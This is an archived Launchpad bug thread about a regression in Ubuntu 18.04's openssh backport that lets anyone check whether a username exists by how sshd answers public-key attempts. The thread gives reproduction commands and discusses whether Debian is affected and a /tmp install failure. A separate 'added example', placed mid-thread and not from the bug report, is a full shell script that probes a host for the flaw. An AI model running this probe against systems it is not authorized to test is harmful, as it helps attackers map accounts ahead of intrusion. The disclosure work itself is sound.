[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability

2021-10-19 Thread Utkarsh Gupta
Thanks, Kazza. That certainly helped. I also had a word with Marc and we
reached the conclusion that Stretch isn't affected by this
backporting problem.

Thanks, again! \o/

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1934501

Title:
  CVE-2018-15473 patch introduce user enumeration vulnerability

Status in openssh package in Ubuntu:
  Fix Released

Bug description:
  I was recently using a 18.04 machine and noticed that the result of
  connecting to ssh with an arbitrary public key varied depending on whether
  the user was valid.

  After some investigation, it appears to only be present when
  CVE-2018-15473.patch has been applied.

  Directly pulling a 18.04 docker image and installing openssh server
  (currently 1:7.6p1-4ubuntu0.3) results in a trivial user enumeration
  vulnerability in the default config.

  Below shows the setup of environment:

  $ docker pull ubuntu:18.04
  18.04: Pulling from library/ubuntu
  Digest: sha256:139b3846cee2e63de9ced83cee7023a2d95763ee2573e5b0ab6dea9dfbd4db8f
  Status: Image is up to date for ubuntu:18.04
  docker.io/library/ubuntu:18.04
  $ docker run -t -i --rm  -e TERM=${TERM}  ubuntu:18.04
  root@75569fbf0b03:/# apt update
  ...snip...
  root@75569fbf0b03:/# apt install openssh-server
  ...snip...
  root@75569fbf0b03:/# dpkg-query -l openssh\*
  Desired=Unknown/Install/Remove/Purge/Hold
  | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
  |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
  ||/ Name                 Version             Architecture  Description
  +++-====================-===================-=============-============================================================================
  ii  openssh-client       1:7.6p1-4ubuntu0.3  amd64         secure shell (SSH) client, for secure access to remote machines
  ii  openssh-server       1:7.6p1-4ubuntu0.3  amd64         secure shell (SSH) server, for secure access from remote machines
  ii  openssh-sftp-server  1:7.6p1-4ubuntu0.3  amd64         secure shell (SSH) sftp server module, for SFTP access from remote machines
  root@75569fbf0b03:/# mkdir /run/sshd
  root@75569fbf0b03:/# /usr/sbin/sshd -D

  Then to perform user enumeration, connecting with a public key results in user enumeration:
  * in the following id_rsa-dummy.pub is removed as it slightly changes message flow
  * I have not checked different versions of the ssh client

  $ ssh -V
  OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f  31 Mar 2020

  $ ssh-keygen -t rsa -C dummy -P '' -f id_rsa-dummy
  $ rm id_rsa-dummy.pub

  $ ssh -i id_rsa-dummy invalid@172.17.0.2
  Connection closed by 172.17.0.2 port 22

  $ ssh -i id_rsa-dummy root@172.17.0.2
  root@172.17.0.2's password: 

  That is, when invalid users are provided to public key auth the
  connection is closed by the server. Otherwise, it will move onto the
  next auth method. This can be improved by adding "ssh -o
  PasswordAuthentication=no" when connecting to avoid password prompt
  and get an easy to script error message.


  I have verified that this behaviour is present after starting with
  original source and only applying CVE-2018-15473.patch from the
  openssh_7.6p1-4ubuntu0.3.debian.tar.xz archive. Without this patch
  this behaviour is not present.

  $ md5sum openssh-7.6p1.tar.gz debian/patches/CVE-2018-15473.patch 
  06a88699018e5fef13d4655abfed1f63  openssh-7.6p1.tar.gz
  6101d47f542690b0c5e354ec8b8a70a1  debian/patches/CVE-2018-15473.patch

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1934501/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
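
The probe the bug description walks through, packaged as an added example
(not code from the bug report, from Ubuntu or from the openssh package): a
POSIX shell script that generates a throwaway key with no .pub file, attempts
publickey-only auth for a name that cannot exist and for "root", and compares
how sshd answers. The server-side fingerprint is the one the report gives:
"Connection closed by ..." for an unknown user versus falling through to the
next method for a real one; with PasswordAuthentication=no the client stops
after the publickey attempt, so the second case surfaces as "Permission
denied". The literal client strings matched below, the probe usernames and
the ConnectTimeout value are assumptions of this example, not stated on the
page. Run it only against hosts you own or are authorized to test.

```shell
#!/bin/sh
# Added example, not from the bug report.  Probes one sshd for the
# CVE-2018-15473 backport regression: a server with the regression drops the
# TCP connection when publickey auth is attempted for a non-existent user
# but answers "Permission denied" for a real one.
#
# Assumptions (not on the page): the client strings "Connection closed by"
# and "Permission denied" are what OpenSSH's ssh prints in the two cases;
# "zz-does-not-exist-zz" and "root" are sample probe names.

# classify_ssh_output STDERR_TEXT -> prints one of
#   closed       server dropped the connection (user likely does NOT exist)
#   denied       server ran the auth methods and refused (user likely exists)
#   unreachable  TCP-level failure, nothing learned
#   unknown      anything else (different client version, banner, etc.)
classify_ssh_output() {
    case "$1" in
        *"Connection closed by"*)  echo closed ;;
        *"Permission denied"*)     echo denied ;;
        *"Connection refused"*|*"Connection timed out"*|*"No route to host"*)
                                   echo unreachable ;;
        *)                         echo unknown ;;
    esac
    return 0
}

# probe_user HOST USER KEYFILE -> classification for one username.
# A private key the server has never seen, PasswordAuthentication=no and
# KbdInteractiveAuthentication=no make ssh give up after the publickey
# attempt; BatchMode=yes removes any prompt.  Host-key checks are disabled
# because only the userauth stage matters here.
probe_user() {
    host=$1; user=$2; key=$3
    out=$(ssh -i "$key" \
              -o IdentitiesOnly=yes \
              -o PubkeyAuthentication=yes \
              -o PasswordAuthentication=no \
              -o KbdInteractiveAuthentication=no \
              -o BatchMode=yes \
              -o StrictHostKeyChecking=no \
              -o UserKnownHostsFile=/dev/null \
              -o ConnectTimeout=5 \
              "$user@$host" true 2>&1 </dev/null) || true
    classify_ssh_output "$out"
}

# verdict RESULT_FOR_INVALID_USER RESULT_FOR_VALID_USER
# "vulnerable" only for the exact asymmetry the report describes; a server
# that already carries the fix (or never had the bad patch) answers both
# probes the same way.
verdict() {
    if [ "$1" = closed ] && [ "$2" = denied ]; then
        echo vulnerable
    elif [ "$1" = "$2" ]; then
        echo "no-difference ($1)"
    else
        echo "inconclusive ($1/$2)"
    fi
    return 0
}

main() {
    host=$1
    key=$(mktemp -u "${TMPDIR:-/tmp}/id_dummy.XXXXXX")
    # Fresh key; the .pub is removed to match the reporter's setup.
    ssh-keygen -q -t ed25519 -N '' -C dummy -f "$key"
    rm -f "$key.pub"
    invalid=$(probe_user "$host" zz-does-not-exist-zz "$key")
    valid=$(probe_user "$host" root "$key")
    printf 'invalid user -> %s\nroot -> %s\nverdict: %s\n' \
        "$invalid" "$valid" "$(verdict "$invalid" "$valid")"
    rm -f "$key"
}

# Only run when a host is given, so the functions can be sourced on their own.
if [ $# -gt 0 ]; then
    main "$@"
fi
```

Usage: `sh ssh-enum-check.sh 172.17.0.2`. "root" is used as the known-good
name because the account exists on every Linux host; PermitRootLogin does not
matter, since the asymmetry is at the userauth stage, before any login
policy applies. The reporter notes that the ssh client version was not
varied; if a newer client prints different text for the closed-connection
case the script reports "unknown" rather than guessing, so check the raw
stderr before drawing a conclusion.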


[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability

2021-10-09 Thread Kazza
Hello Utkarsh,

I've just quickly run through the steps in the original bug report
against a recent Debian Stretch docker image and was not able to
reproduce it.

Image tested:
$ docker images | grep stretch
debian   stretch   d74a4ce6ed8b   11 days ago   101MB

If you are concerned, I suggest looking into the history/VCS logs of:
* debian/patches/CVE-2018-15473.patch

Then you can know if it traces back to Debian.

Hope it helps.


[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability

2021-10-05 Thread Utkarsh Gupta
Hi Kazza, Marc,

I was wondering if you can repro the same bug in Debian Stretch? Do you
have the capacity to test that as well, please? :)


[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability

2021-08-12 Thread Marc Deslauriers
Here's the debconf bug report:

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=223683


[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability

2021-08-12 Thread Marc Deslauriers
This isn't specific to the openssh update. Debian packages use tools
such as debconf that need to write to /tmp to function correctly.

** Bug watch added: Debian Bug tracker #223683
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=223683


[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability

2021-08-12 Thread Pavel Malyshev
Hi. I believe my Ubuntu systems just received this patch and I believe it 
failed to install:

Can't exec "/tmp/openssh-server.config.neW0Pf": Permission denied at /usr/share/perl/5.26/IPC/Open3.pm line 178.
open2: exec of /tmp/openssh-server.config.neW0Pf configure 1:7.6p1-4ubuntu0.3 failed: Permission denied at /usr/share/perl5/Debconf/ConfModule.pm line 59.

I think this is due to the fact I have noexec on /tmp.
Is it possible to bundle the changes in the package instead of putting a random 
temporary file in /tmp and attempt to execute it?


[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability

2021-08-12 Thread Marc Deslauriers
** Information type changed from Private Security to Public Security
